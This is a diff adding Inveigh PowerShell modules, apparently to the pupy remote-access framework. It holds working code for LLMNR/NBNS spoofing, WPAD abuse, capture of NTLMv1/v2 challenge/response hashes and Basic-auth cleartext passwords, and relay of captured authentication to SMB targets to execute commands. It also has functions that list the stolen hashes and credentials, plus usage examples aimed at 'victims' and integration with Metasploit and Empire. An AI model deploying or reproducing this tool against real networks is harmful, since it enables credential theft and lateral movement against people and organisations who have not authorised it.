+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")])
+                        $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash)
+                        $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash)
+                        
+                        if($inveigh.file_output)
+                        {
+                            $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                        }
+                        
+                    }
+                    
+                    if ($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat)
+                    {
+                        $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address
+                    }
+
+                }
+                
+                $inveigh.response.StatusCode = 200
+                $NTLM_challenge = ''
+                $HTTP_raw_url_output = $true
+                
+                if ($inveigh.SMB_relay -and $inveigh.SMB_relay_active_step -eq 3)
+                {
+
+                    if(!$SMBRelayUsernames -or $SMBRelayUsernames -contains $HTTP_NTLM_user_string -or $SMBRelayUsernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                    {
+
+                        if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
+                        {
+
+                            if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
+                            {
+
+                                if($NTLM_type -eq 'NTLMv2')
+                                {
+                                    $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")
+                                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $SMBRelaytarget")])
+                                    $SMB_relay_response_return_bytes = SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_user_ID
+                                    $SMB_relay_response_return_bytes = $SMB_relay_response_return_bytes[1..$SMB_relay_response_return_bytes.Length]
+                    
+                                    if(!$SMB_relay_failed -and [System.BitConverter]::ToString($SMB_relay_response_return_bytes[9..12]) -eq '00-00-00-00')
+                                    {
+                                        $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+                                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
+                                        $inveigh.SMB_relay_active_step = 4
+                                        SMBRelayExecute $SMB_relay_socket $SMB_user_ID          
+                                    }
+                                    else
+                                    {
+                                        $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")
+                                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $SMBRelayTarget")])
+                                        $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $SMBRelayTarget")
+                                        $inveigh.SMB_relay_active_step = 0
+                                        $SMB_relay_socket.Close()
+                                    }
+
+                                }
+                                else
+                                {
+                                    $inveigh.console_queue.Add("NTLMv1 SMB relay not yet supported")
+                                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NTLMv1 relay not yet supported")])
+                                    $inveigh.SMB_relay_active_step = 0
+                                    $SMB_relay_socket.Close()
+                                }
+
+                            }
+                            else
+                            {
+                                $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")
+                                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $SMBRelayTarget")])
+                                $inveigh.SMB_relay_active_step = 0
+                                $SMB_relay_socket.Close()
+                            }
+
+                        }
+                        else
+                        {
+                            $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
+                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")])
+                            $inveigh.SMB_relay_active_step = 0
+                            $SMB_relay_socket.Close()
+                        }
+
+                    }
+                    else
+                    {
+                        $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")])
+                        $inveigh.SMB_relay_active_step = 0
+                        $SMB_relay_socket.Close()
+                    }
+
+                }
+
+            }
+            else
+            {
+                $NTLM = 'NTLM'
+            }
+        
+        }
+        
+        [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
+        $inveigh.response.ContentLength64 = $HTTP_buffer.Length
+        $inveigh.response.AddHeader("WWW-Authenticate",$NTLM)
+        $HTTP_stream = $inveigh.response.OutputStream
+        $HTTP_stream.Write($HTTP_buffer,0,$HTTP_buffer.Length)
+        $HTTP_stream.close()
+    }
+
+    $inveigh.HTTP_listener.Stop()
+    $inveigh.HTTP_listener.Close()
+}
+
+$control_relay_scriptblock = 
+{
+    param ($RunTime)
+
+    if($RunTime)
+    {    
+        $control_timeout = New-TimeSpan -Minutes $RunTime
+        $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+       
+    while ($inveigh.relay_running)
+    {
+
+        if($RunTime)
+        {
+
+            if($control_stopwatch.Elapsed -ge $control_timeout)
+            {
+
+                if($inveigh.HTTP_listener.IsListening)
+                {
+                    $inveigh.HTTP_listener.Stop()
+                    $inveigh.HTTP_listener.Close()
+                }
+            
+                $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
+                Start-Sleep -m 5
+                $inveigh.relay_running = $false
+
+                if($inveigh.HTTPS)
+                {
+                    & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+        
+                    try
+                    {
+                        $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+                        $certificate_store.Open('ReadWrite')
+                        $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$false)[0]
+                        $certificate_store.Remove($certificate)
+                        $certificate_store.Close()
+                    }
+                    catch
+                    {
+
+                        if($inveigh.status_output)
+                        {
+                            $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
+                        }
+
+                        $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+
+                        if($inveigh.file_output)
+                        {
+                            "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
+                        }
+                    
+                    }
+                
+                }     
+
+                $inveigh.HTTP = $false
+                $inveigh.HTTPS = $false
+            }
+
+        }
+
+        if($inveigh.file_output -and $inveigh.relay_file_output)
+        {
+
+            while($inveigh.log_file_queue.Count -gt 0)
+            {
+                $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+                $inveigh.log_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.NTLMv1_file_queue.Count -gt 0)
+            {
+                $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+                $inveigh.NTLMv1_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.NTLMv2_file_queue.Count -gt 0)
+            {
+                $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append
+                $inveigh.NTLMv2_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.cleartext_file_queue.Count -gt 0)
+            {
+                $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append
+                $inveigh.cleartext_file_queue.RemoveAt(0)
+            }
+        
+        }
+
+        Start-Sleep -m 5
+    }
+
+ }
+
+# HTTP/HTTPS Listener Startup function 
+function HTTPListener()
+{
+    $inveigh.HTTP_listener = New-Object System.Net.HttpListener
+
+    if($inveigh.HTTP)
+    {
+        $inveigh.HTTP_listener.Prefixes.Add('http://*:80/')
+    }
+
+    if($inveigh.HTTPS)
+    {
+        $inveigh.HTTP_listener.Prefixes.Add('https://*:443/')
+    }
+
+    $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" 
+    $inveigh.HTTP_listener.Start()
+    $HTTP_runspace = [RunspaceFactory]::CreateRunspace()
+    $HTTP_runspace.Open()
+    $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $HTTP_powershell = [PowerShell]::Create()
+    $HTTP_powershell.Runspace = $HTTP_runspace
+    $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
+    $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
+    $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
+    $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
+    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument(
+        $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument(
+        $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null
+    $HTTP_powershell.BeginInvoke() > $null
+}
+
+# Control Relay Startup function
+function ControlRelayLoop()
+{
+    $control_relay_runspace = [RunspaceFactory]::CreateRunspace()
+    $control_relay_runspace.Open()
+    $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh)
+    $control_relay_powershell = [PowerShell]::Create()
+    $control_relay_powershell.Runspace = $control_relay_runspace
+    $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null
+    $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($RunTime) > $null
+    $control_relay_powershell.BeginInvoke() > $null
+}
+
+# HTTP Server Start
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+    HTTPListener
+}
+
+# Control Relay Loop Start
+if($RunTime -or $inveigh.file_output)
+{
+    ControlRelayLoop
+}
+
+if($inveigh.console_output)
+{
+
+    :console_loop while($inveigh.relay_running -and $inveigh.console_output)
+    {
+
+        while($inveigh.console_queue.Count -gt 0)
+        {
+
+            if($inveigh.output_stream_only)
+            {
+                Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+                $inveigh.console_queue.RemoveAt(0)
+            }
+            else
+            {
+
+                switch -wildcard ($inveigh.console_queue[0])
+                {
+
+                    "* written to *"
+                    {
+
+                        if($inveigh.file_output)
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                        }
+
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "* for relay *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "*SMB relay *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    "* local administrator *"
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                    default
+                    {
+                        Write-Output $inveigh.console_queue[0]
+                        $inveigh.console_queue.RemoveAt(0)
+                    }
+
+                }
+
+            }
+
+        }
+
+        if($inveigh.console_input)
+        {
+
+            if([Console]::KeyAvailable)
+            {
+                $inveigh.console_output = $false
+                BREAK console_loop
+            }
+        
+        }
+
+        Start-Sleep -m 5
+    }
+
+}
+
+}
+#End Invoke-InveighRelay
+
+function Stop-Inveigh
+{
+<#
+.SYNOPSIS
+Stop-Inveigh will stop all running Inveigh functions.
+#>
+
+if($inveigh)
+{
+
+    if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+    {
+
+        if($inveigh.HTTP_listener.IsListening)
+        {
+            $inveigh.HTTP_listener.Stop()
+            $inveigh.HTTP_listener.Close()
+        }
+            
+        if($inveigh.unprivileged_running)
+        {
+            $inveigh.unprivileged_running = $false
+            Start-Sleep -s 5
+            Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        }
+            
+        if($inveigh.relay_running)
+        {
+            $inveigh.relay_running = $false
+            Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        } 
+
+        if($inveigh.running)
+        {
+            $inveigh.running = $false
+            Write-Output("Inveigh exited at $(Get-Date -format 's')")
+            $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+            }
+
+        } 
+
+    }
+    else
+    {
+        Write-Output("There are no running Inveigh functions")
+    }
+    
+    if($inveigh.HTTPS)
+    {
+        & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null
+
+        try
+        {
+            $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+            $certificate_store.Open('ReadWrite')
+            $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0]
+            $certificate_store.Remove($certificate)
+            $certificate_store.Close()
+        }
+        catch
+        {
+            Write-Output("SSL Certificate Deletion Error - Remove Manually")
+            $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")  > $null
+
+            if($inveigh.file_output)
+            {
+                "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append   
+            }
+
+        }
+    }
+
+    $inveigh.HTTP = $false
+    $inveigh.HTTPS = $false
+}
+else
+{
+    Write-Output("There are no running Inveigh functions")|Out-Null
+}
+
+} 
+
+function Get-Inveigh
+{
+<#
+.SYNOPSIS
+Get-Inveigh will get stored Inveigh data from memory.
+
+.PARAMETER Console
+Get queued console output. This is also the default if no parameters are set. 
+
+.PARAMETER Log
+Get log entries.
+
+.PARAMETER NTLMv1
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv1Unique
+Get the first captured NTLMv1 challenge/response for each unique account.
+
+.PARAMETER NTLMv1Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER NTLMv2
+Get captured NTLMv1 challenge/response hashes.
+
+.PARAMETER NTLMv2Unique
+Get the first captured NTLMv2 challenge/response for each unique account.
+
+.PARAMETER NTLMv2Usernames
+Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+
+.PARAMETER Cleartext
+Get captured cleartext credentials.
+
+.PARAMETER CleartextUnique
+Get unique captured cleartext credentials.
+
+.PARAMETER Learning
+Get valid hosts discovered through spoofer learning.
+#>
+
+[CmdletBinding()]
+param
+( 
+    [parameter(Mandatory=$false)][Switch]$Console,
+    [parameter(Mandatory=$false)][Switch]$Log,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1Unique,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2Unique,
+    [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames,
+    [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
+    [parameter(Mandatory=$false)][Switch]$Cleartext,
+    [parameter(Mandatory=$false)][Switch]$CleartextUnique,
+    [parameter(Mandatory=$false)][Switch]$Learning,
+    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($Console -or $PSBoundParameters.Count -eq 0)
+{
+
+    while($inveigh.console_queue.Count -gt 0)
+    {
+
+        if($inveigh.output_stream_only)
+        {
+            Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+            $inveigh.console_queue.RemoveAt(0)
+        }
+        else
+        {
+
+            switch -wildcard ($inveigh.console_queue[0])
+            {
+
+                "* written to *"
+                {
+
+                    if($inveigh.file_output)
+                    {
+                        Write-Warning $inveigh.console_queue[0]
+                    }
+
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "* for relay *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "*SMB relay *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                "* local administrator *"
+                {
+                    Write-Warning $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+                default
+                {
+                    Write-Output $inveigh.console_queue[0]
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+
+            }
+
+        }
+         
+    }
+
+}
+
+if($Log)
+{
+    Write-Output $inveigh.log
+}
+
+if($NTLMv1)
+{
+    Write-Output $inveigh.NTLMv1_list
+}
+
+if($NTLMv1Unique)
+{
+    $inveigh.NTLMv1_list.Sort()
+
+    foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+    {
+        $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+        if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+        {
+            Write-Output $unique_NTLMv1
+        }
+
+        $unique_NTLMv1_account_last = $unique_NTLMv1_account
+    }
+
+}
+
+if($NTLMv1Usernames)
+{
+    Write-Output $inveigh.NTLMv2_username_list
+}
+
+if($NTLMv2)
+{
+    Write-Output $inveigh.NTLMv2_list
+}
+
+if($NTLMv2Unique)
+{
+    $inveigh.NTLMv2_list.Sort()
+
+    foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+    {
+        $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+        if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+        {
+            Write-Output $unique_NTLMv2
+        }
+
+        $unique_NTLMv2_account_last = $unique_NTLMv2_account
+    }
+
+}
+
+if($NTLMv2Usernames)
+{
+    Write-Output $inveigh.NTLMv2_username_list
+}
+
+if($Cleartext)
+{
+    Write-Output $inveigh.cleartext_list
+}
+
+if($CleartextUnique)
+{
+    Write-Output $inveigh.cleartext_list | Get-Unique
+}
+
+if($Learning)
+{
+    Write-Output $inveigh.valid_host_list
+}
+
+}
+
+function Watch-Inveigh
+{
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+#>
+
+if($inveigh.tool -ne 1)
+{
+
+    if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running)
+    {
+        Write-Output "Press any key to stop real time console output"
+        $inveigh.console_output = $true
+
+        :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+        {
+
+            while($inveigh.console_queue.Count -gt 0)
+            {
+
+                if($inveigh.output_stream_only)
+                {
+                    Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+                    $inveigh.console_queue.RemoveAt(0)
+                }
+                else
+                {
+
+                    switch -wildcard ($inveigh.console_queue[0])
+                    {
+                          
+                        "* written to *"
+                        {
+
+                            if($inveigh.file_output)
+                            {
+                                Write-Warning $inveigh.console_queue[0]
+                            }
+
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "* for relay *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "*SMB relay *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        "* local administrator *"
+                        {
+                            Write-Warning $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                        default
+                        {
+                            Write-Output $inveigh.console_queue[0]
+                            $inveigh.console_queue.RemoveAt(0)
+                        }
+
+                    }
+
+                }
+                             
+            }
+
+            if([Console]::KeyAvailable)
+            {
+                $inveigh.console_output = $false
+                BREAK console_loop
+            }
+
+            Start-Sleep -m 5
+        }
+
+    }
+    else
+    {
+        Write-Output "Inveigh isn't running"
+    }
+
+}
+else
+{
+    Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
+
+function Clear-Inveigh
+{
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
+
+if($inveigh)
+{
+
+    if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.unprivileged_running)
+    {
+        Remove-Variable inveigh -scope global
+        Write-Output "Inveigh data has been cleared from memory"
+    }
+    else
+    {
+        Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+    }
+
+}
+
+}

--- a/pupy/external/Inveigh/Inveigh-Unprivileged.ps1
+++ b/pupy/external/Inveigh/Inveigh-Unprivileged.ps1
@@ -1,0 +1,2419 @@
+function Invoke-InveighUnprivileged
+{
+<#
+.SYNOPSIS
+Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP. This
+version of Inveigh does not require local admin access.
+
+.DESCRIPTION
+Invoke-InveighUnprivileged is a Windows PowerShell LLMNR/NBNS spoofer with the following features:
+
+    Local admin is not required for any feature
+    IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service
+    IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled
+    Targeted IPv4 NBNS transaction ID brute force spoofer with granular control
+    NTLMv1/NTLMv2 challenge/response capture over HTTP
+    Basic auth cleartext credential capture over HTTP
+    WPAD server capable of hosting a basic or custom wpad.dat file
+    HTTP server capable of hosting limited content
+    Granular control of console and file output
+    Run time control
+
+This function contains only features that do not require local admin access. Note that there are caveats. A local
+firewall can still prevent traffic from reaching this function's listeners. Also, if LLMNR is enabled on the host,
+the LLMNR spoofer will not work. Both of these scenarios would still require local admin access to
+change. 
+
+.PARAMETER SpooferIP
+IP address for the LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+other than the Inveigh host.
+
+.PARAMETER SpooferHostsReply
+Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferHostsIgnore
+Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferIPsReply
+Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferIPsIgnore
+Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+
+.PARAMETER SpooferRepeat
+Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user
+challenge/response has been captured.
+
+.PARAMETER LLMNR
+Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer.
+
+.PARAMETER LLMNRTTL
+Default = 30 Seconds: LLMNR TTL in seconds for the response packet.
+
+.PARAMETER NBNS
+Default = Disabled: (Y/N) Enable/Disable NBNS spoofer.
+
+.PARAMETER NBNSTTL
+Default = 165 Seconds: NBNS TTL in seconds for the response packet.
+
+.PARAMETER NBNSBruteForce
+Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer.
+
+.PARAMETER NBNSBruteForceHost
+Default = WPAD: Hostname for the NBNS Brute Force spoofer.
+
+.PARAMETER NBNSBruteForcePause
+Default = Disabled: (Integer) Number of seconds the NBNS brute force spoofer will stop spoofing after an incoming
+HTTP request is received.
+
+.PARAMETER NBNSBruteForceTarget
+IP address to target for NBNS brute force spoofing. 
+
+.PARAMETER HTTP
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+
+.PARAMETER HTTPIP
+Default = Any: IP address for the HTTP listener.
+
+.PARAMETER HTTPPort
+Default = 80: TCP port for the HTTP listener.
+
+.PARAMETER HTTPAuth
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to
+wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016 patches. A
+WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and
+connecting to the root of the HTTP listener.
+
+.PARAMETER HTTPBasicRealm
+Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
+
+.PARAMETER HTTPResponse
+String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+Use PowerShell character escapes where necessary.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADEmptyFile
+Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests.
+Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when
+using WPADIP, WPADPort, or WPADResponse.
+
+.PARAMETER WPADIP
+Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used
+with WPADPort.
+
+.PARAMETER WPADPort
+Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be
+used with WPADIP.
+
+.PARAMETER WPADDirectHosts
+Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the
+defined proxy. Use PowerShell character escapes where necessary.
+
+.PARAMETER WPADResponse
+wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort
+are set.
+
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. This will only be used for non-relay captures.
+
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER ConsoleOutput
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileUnique
+Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time file output is enabled.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Unprivileged through a shell that does not return other output streams. Note that you will not see
+the various yellow warning messages if enabled.
+
+.PARAMETER OutputDir
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
+
+.PARAMETER RunTime
+Default = Unlimited: (Integer) Run time duration in minutes.
+
+.PARAMETER RunCount
+Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
+.PARAMETER Tool
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire 
+
+.EXAMPLE
+Import-Module .\Inveigh.psd1;Invoke-InveighUnprivileged -ConsoleOutput Y
+
+.EXAMPLE
+Invoke-InveighUnprivileged -NBNSBruteForce Y -SpooferTarget 192.168.1.11 -Hostname server1
+Target 192.168.1.11 for 'server1' hostname spoofs.
+
+.EXAMPLE
+Invoke-InveighUnprivileged -NBNSBruteForce Y -SpooferTarget 192.168.1.11 -WPADIP 192.168.10.10 -WPADPort 8080
+Target 192.168.1.11 for 'WPAD' hostname spoofs and respond to wpad.dat requests with a proxy of 192.168.10.10:8080.
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+# Parameter default values can be modified in this section: 
+[CmdletBinding()]
+param
+(
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
